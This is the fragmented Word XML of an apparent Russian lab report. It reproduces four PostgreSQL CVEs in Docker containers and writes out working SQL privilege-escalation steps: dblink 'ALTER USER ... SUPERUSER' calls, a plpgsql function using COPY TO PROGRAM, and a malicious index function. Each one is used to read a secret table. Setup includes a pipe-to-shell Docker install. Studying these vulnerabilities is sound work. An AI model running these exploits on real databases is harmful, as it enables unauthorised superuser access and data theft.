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700E8" w14:textId="77777777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6055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> помощью следующих команд:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9A49CB" w14:textId="77777777" w:rsidR="001C2EF4" w:rsidRPr="006055A9" w:rsidRDefault="001C2EF4" w:rsidP="001D611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wget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--output-document=- https://get.docker.com | </w:t>
      </w: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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A5A9252" w14:textId="77777777" w:rsidR="001C2EF4" w:rsidRPr="006055A9" w:rsidRDefault="001C2EF4" w:rsidP="001D611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 xml:space="preserve">Добавление пользователя для дальнейшей </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>работы  с</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> помощью следующих команд:</w:t>
      </w:r>
      <w:r w:rsidRPr="006055A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groupadd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docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAC1FD8" w14:textId="77777777" w:rsidR="001C2EF4" w:rsidRPr="006055A9" w:rsidRDefault="001C2EF4" w:rsidP="001D611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usermod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aG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docker</w:t>
      </w:r>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $</w:t>
      </w:r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</w:p>
    <w:p w14:paraId="273E7539" w14:textId="77777777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Клонирование репозитория с помощью следующих команд:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2223CF72" w14:textId="77777777" w:rsidR="001C2EF4" w:rsidRPr="006055A9" w:rsidRDefault="001C2EF4" w:rsidP="001D611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apt install git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01645B27" w14:textId="3308500C" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="001C2EF4" w:rsidP="001D611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git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="006055A9">
          <w:rPr>
            <w:rStyle w:val="ac"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/x4m/pg_cve_demo/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CCCE564" w14:textId="5B893745" w:rsidR="001D6115" w:rsidRPr="006055A9" w:rsidRDefault="001D61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1A3B57" w14:textId="77777777" w:rsidR="001D6115" w:rsidRPr="006055A9" w:rsidRDefault="001D6115" w:rsidP="001D611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59A83B" w14:textId="09C13A53" w:rsidR="00E007BB" w:rsidRPr="006055A9" w:rsidRDefault="00E007BB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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-2007-6601</w:t>
      </w:r>
      <w:r w:rsidR="00A109AE" w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A109AE" w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DBLink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A109AE" w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в сочетании с локальным доверием или контролем доступа к идентификаторам могут использоваться злоумышленником для получения привилегий суперпользователя. Для использования этой уязвимости необходим действительный логин.</w:t>
      </w:r>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Далее выполняется команда для поднятия контейнера и дальнейшей работы с базой данных:</w:t>
      </w:r>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w: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FCDA6" wp14:editId="4F912DC0">
            <wp:extent cx="5940425" cy="2611120"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="188881998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598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A7D0" w14:textId="21E06AEF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Подключение к базе данных:</w:t>
      </w:r>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w: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61A68" wp14:editId="33D19AD6">
            <wp:extent cx="5940425" cy="1511300"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="81628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F4F" w14:textId="17667AAE" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1" w:rsidP="001D6115">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="23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Эксплуатация уязвимости с помощью следующих запросов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49762F19" w14:textId="6955E33F" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1" w:rsidP="001D6115">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="237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dblink_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'host=localhost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dbname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secret_db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', 'ALTER USER user1 WITH SUPERUSER;');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br/>
        <w:t xml:space="preserve">\c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316E289" w14:textId="3001D560" w:rsidR="001C2EF4" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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3940C" wp14:editId="3B96B515">
            <wp:extent cx="5940425" cy="2179320"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="125930436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436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5118" w14:textId="7AB4D213" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1" w:rsidP="001D611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55A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secret_table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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683367F6" w14:textId="184E8C3E" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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66D98D" wp14:editId="5B0EA519">
            <wp:extent cx="5940425" cy="944245"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:docPr id="143835840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5840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485" w14:textId="2A323CCB" w:rsidR="001D6115" w:rsidRPr="006055A9" w:rsidRDefault="001D61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452EF7E" w14:textId="77777777" w:rsidR="001D6115" w:rsidRPr="006055A9" w:rsidRDefault="001D61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11981C" w14:textId="627E3212" w:rsidR="00E007BB" w:rsidRPr="006055A9" w:rsidRDefault="00E007BB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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-2018-10915</w:t>
      </w:r>
      <w:r w:rsidR="00F11E15" w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Определенные параметры соединения хоста наносят ущерб защите безопасности на стороне клиента.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3B7E7B" w14:textId="14701CE9" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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Далее выполняется команда для поднятия контейнера и дальнейшей работы с базой данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B58D945" w14:textId="78B866A2" w:rsidR="00E007BB" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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463BF4" wp14:editId="2B5C3F4E">
            <wp:extent cx="5940425" cy="2879090"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="3736153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53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9A5" w14:textId="58690086" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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Подключение к базе данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C5EE1" w14:textId="53ACEEE1" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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55A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>psql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postgresql://user1:password@127.0.0.1:5432/db1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1BFD9E" w14:textId="08B129C7" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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C6D65" wp14:editId="2C749F1C">
            <wp:extent cx="5940425" cy="710565"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="152907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5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22DD" w14:textId="518B3705" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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</w:rPr>
        <w:t>Эксплуатация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55A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>уязвимости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09D46E" w14:textId="77777777" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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F274114" w14:textId="77777777" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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ALTER SYSTEM SET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default_transaction_read_only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on;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="48F556E1" w14:textId="6FF849D2" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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pg_reload_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006055A9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</w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB1C1C4" w14:textId="3F865F98" w:rsidR="00B95AF1" w:rsidRPr="006055A9" w:rsidRDefault="00B95AF1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E111A" wp14:editId="5E104086">
            <wp:extent cx="5940425" cy="1475740"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="16403512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12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6D12" w14:textId="2EE66FB0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dblink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'host=192.168.233.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3,localhost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port=5433,5432 user=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password=password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target_session_attrs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=read-write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dbname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secret_db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', 'SELECT * FROM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secret_table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c text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0F2DBB0E" w14:textId="44F423B1" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D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A132B" wp14:editId="7704C292">
            <wp:extent cx="5940425" cy="1029970"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="21065473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735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93D6" w14:textId="6B6579D7" w:rsidR="001D6115" w:rsidRPr="006055A9" w:rsidRDefault="001D61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F002C1C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799284" w14:textId="12A635D0" w:rsidR="00E007BB" w:rsidRPr="006055A9" w:rsidRDefault="00E007BB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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-202</w:t>
      </w:r>
      <w:r w:rsidR="00E7017D" w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0-14349</w:t>
      </w:r>
      <w:r w:rsidR="00F11E15" w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – The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search_path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настройка определяет схемы, которые ищут таблицы, функции, операторы и т.д. The CVE-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F11E15" w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2018-1058</w:t>
      </w:r>
      <w:proofErr w:type="gram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исправление заставило большинство клиентских приложений, предоставляемых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, дезинфицировать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search_path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, но логическое воспроизведение продолжало уходить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search_path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неизменный. Пользователи издателя репликации или базы данных подписчиков могут создавать объекты в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схема и использование их для выполнения произвольных функций SQL под управлением репликации, часто суперпользователем. Установки, принявшие документированный безопасный схема использования не уязвимы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C52AD20" w14:textId="4A8A7624" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D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Далее выполняется команда для поднятия контейнера и дальнейшей работы с базой данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D54FE" w14:textId="686456BD" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D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608745" wp14:editId="7534380A">
            <wp:extent cx="5940425" cy="2711450"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="20646746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746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46EB" w14:textId="4CB97699" w:rsidR="001C2EF4" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D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Подключение к базе данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859A950" w14:textId="0A26743B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://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055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1: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055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>@127.0.0.1:5432/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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A1870A" w14:textId="77777777" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D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CB0711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</w:rPr>
        <w:t>Эксплуатация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55A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>уязвимости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6719F5" w14:textId="590B1FAD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public.pg_get_replica_identity_index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(int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645BB8B9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RETURNS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regclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DCA808D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LANGUAGE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plpgsql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CB277EA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AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AF2BEA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C349D07" w14:textId="2E72D686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COPY (SELECT 1) TO PROGRAM '/pg12/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/bin/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psql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-c "ALTER USER user1 WITH SUPERUSER;"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gramEnd"/>
    </w:p>
    <w:p w14:paraId="6978FA78" w14:textId="069CAE52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pg_catalog.pg_get_replica_identity_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index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$1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12DC122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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025DD474" w14:textId="335712A3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</w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D5B338" w14:textId="280A567F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A51137" wp14:editId="1AD8693C">
            <wp:extent cx="5940425" cy="1426845"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1905"/>
            <wp:docPr id="68694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5C19" w14:textId="77777777" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D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</w:rPr>
        <w:t>Результат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BC06DB0" w14:textId="6AA0A1FD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\c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secret_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CB8556F" w14:textId="403CCC55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0C91AD4" w14:textId="5F5B558C" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D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EDC3EF" wp14:editId="2B9DA7DB">
            <wp:extent cx="5940425" cy="2033905"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="200259361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361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1DA" w14:textId="23229E38" w:rsidR="001D6115" w:rsidRPr="006055A9" w:rsidRDefault="001D61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21CA217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481299" w14:textId="33F5FCDC" w:rsidR="00F11E15" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D" w:rsidP="00F11E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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-2022-1552</w:t>
      </w:r>
      <w:r w:rsidR="00F11E15" w:rsidRPr="006055A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Автовакуум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, REINDEX, CREATE INDEX, REFRESH MATERIALIZED VIEW,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CLUSTERи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E15" w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pg_amcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F11E15" w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> приложил неполные усилия для безопасной работы, когда привилегированный пользователь поддержание объектов другого пользователя. Эти команды активировали релевантные защита слишком поздно или вообще не нужна. Злоумышленник имеет разрешение на создание не-темповые объекты по меньшей мере в одной схеме могли выполнять произвольные функции SQL под идентификацией суперпользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C484E52" w14:textId="7EF25EBB" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00F11E15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 xml:space="preserve">Хотя быстрое обновление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является лучшим исправлением для большинства пользователей пользователь, неспособный сделать это, может обойти уязвимость, отключив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autovacuum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, не запускать вручную вышеуказанные команды, и не восстанавливать из выход </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pg_dump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командование. Производительность может быстро ухудшиться при этом обходной. VACUUM это безопасно, и все команды хороши, когда доверенный пользователь владеет целевым объектом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E974F87" w14:textId="77777777" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D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Далее выполняется команда для поднятия контейнера и дальнейшей работы с базой данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD2C5DD" w14:textId="60D6E931" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="001D6115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CE9D3" wp14:editId="0EE9B602">
            <wp:extent cx="5940425" cy="2379980"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270"/>
            <wp:docPr id="6926908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908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5E44" w14:textId="77777777" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D" w:rsidP="001D6115">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="205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Подключение к базе данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AD3D8B" w14:textId="44F82A03" w:rsidR="00E7017D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://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055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1: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055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>@127.0.0.1:5432/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055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="006055A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859995" wp14:editId="4639FE65">
            <wp:extent cx="5940425" cy="636270"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="89199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91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0C8C" w14:textId="3F931EAE" w:rsidR="001D6115" w:rsidRPr="006055A9" w:rsidRDefault="001D6115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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эксплуатация уязвимости с помощью следующей функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145285F2" w14:textId="25E68E2D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bttest_a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AS SELECT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as id FROM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generate_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series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1, 1000)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79AAE0C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bttest_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OWNER TO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regress_bttest_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role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147035C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(int8) RETURNS int8 AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C58B937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2C62FD3" w14:textId="751BC4CB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current_user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' then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48257803" w14:textId="45598679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ALTER USER user1 WITH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superuser;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6079D411" w14:textId="1688AAFF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if;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3CC98D3B" w14:textId="1414C6B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$1;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B3BF058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END;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="658026A0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plpgsql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IMMUTABLE;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0056ACFC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bttest_a_expr_idx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bttest_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((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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(id) +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0)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1836DF65" w14:textId="7C18184B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id + 10) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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10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0C24E0BD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alter function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ifun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volatile;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="229DE0E7" w14:textId="4368EFD4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pg_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sleep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055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2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1462CED2" w14:textId="4994E8A6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55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AE13AD" wp14:editId="28C2D1F3">
            <wp:extent cx="5940425" cy="3655060"/>
            <wp:effectExtent l="0" t="0" r="3175" b="2540"/>
            <wp:docPr id="17708263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63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CAA9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74DC73" w14:textId="6CAE1E4C" w:rsidR="001D6115" w:rsidRPr="006055A9" w:rsidRDefault="001D6115" w:rsidP="001D6115">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="20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</w:rPr>
        <w:t>Результат</w:t>
      </w:r>
      <w:r w:rsidRPr="006055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69B86C" w14:textId="77777777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\c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secret_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52A158D0" w14:textId="09D4BCF6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055A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secret_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006055A9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spellEnd"/>
      <w:r w:rsidRPr="006055A9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DA5FC5A" w14:textId="382F2AAE" w:rsidR="001D6115" w:rsidRPr="006055A9" w:rsidRDefault="001D6115" w:rsidP="001D6115">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2055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52D2E" wp14:editId="1BC96CA8">
            <wp:extent cx="5940425" cy="2368550"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="34421357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1357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DFD" w14:textId="77777777" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D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4F8DCD" w14:textId="77777777" w:rsidR="00E7017D" w:rsidRPr="006055A9" w:rsidRDefault="00E7017D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39D88E" w14:textId="77777777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2838D6" w14:textId="77777777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CF6D77" w14:textId="77777777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5A51D7" w14:textId="1B635A51" w:rsidR="001C2EF4" w:rsidRPr="006055A9" w:rsidRDefault="001C2EF4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55A9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364E7BC" w14:textId="77777777" w:rsidR="000D2C80" w:rsidRPr="006055A9" w:rsidRDefault="000D2C80" w:rsidP="001D611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D2C80" w:rsidRPr="006055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DDB"/>
    <w:rsid w:val="000D2C80"/>
    <w:rsid w:val="001A3DDB"/>
    <w:rsid w:val="001C2EF4"/>
    <w:rsid w:val="001D6115"/>
    <w:rsid w:val="00366377"/>
    <w:rsid w:val="00471AEE"/>
    <w:rsid w:val="005128D6"/>
    <w:rsid w:val="0053685E"/>
    <w:rsid w:val="006055A9"/>
    <w:rsid w:val="006C3B90"/>
    <w:rsid w:val="00790F31"/>
    <w:rsid w:val="00A109AE"/>
    <w:rsid w:val="00B95AF1"/>
    <w:rsid w:val="00E007BB"/>
    <w:rsid w:val="00E7017D"/>
    <w:rsid w:val="00F11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EBBD5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4BD3CD24-47D1-478F-9535-ED8B2C0B8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аза"/>
    <w:qFormat/>
    <w:rsid w:val="00E7017D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128D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3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3D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3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D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3D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3D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D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D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28D6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A3D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A3D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A3DDB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF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1A3DDB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF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1A3DDB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6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1A3DDB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6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1A3DDB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8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1A3DDB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="001A3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3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3DDB"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
